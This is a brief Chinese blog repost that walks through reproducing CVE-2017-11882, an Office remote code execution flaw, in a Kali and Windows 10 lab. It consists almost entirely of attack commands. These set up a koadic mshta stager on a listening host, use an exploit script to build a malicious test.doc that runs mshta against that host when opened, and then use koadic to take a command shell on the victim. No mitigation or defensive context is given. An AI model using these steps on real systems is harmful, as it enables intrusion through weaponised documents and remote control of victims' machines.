首页 > 其他 > 详细

CVE-2017-11882-Office远程代码执行漏洞复现

时间:2017-12-01 20:08:21      阅读:354      评论:0      收藏:0      [点我收藏+]

实验环境:win10+kali

工具:koadic,Command43b_CVE-2017-11882.py

KALI:

root@kali:/opt/koadic-master# ./koadic

技术分享图片

(koadic: stager/js/mshta)# set lhost 10.73.28.148

(koadic: stager/js/mshta)# set lport 55555

(koadic: stager/js/mshta)# run

技术分享图片

 python C:\Users\esafenet\Desktop\Command43b_CVE-2017-11882.py -c "mshta http://10.73.28.148:55555/Vr745" -o test.doc

技术分享图片

win10上打开test.doc

技术分享图片

(koadic: stager/js/mshta)# zombies 0

(koadic: stager/js/mshta)# cmdshell 0

技术分享图片

 

CVE-2017-11882-Office远程代码执行漏洞复现

原文:http://www.cnblogs.com/peterpan0707007/p/7944206.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!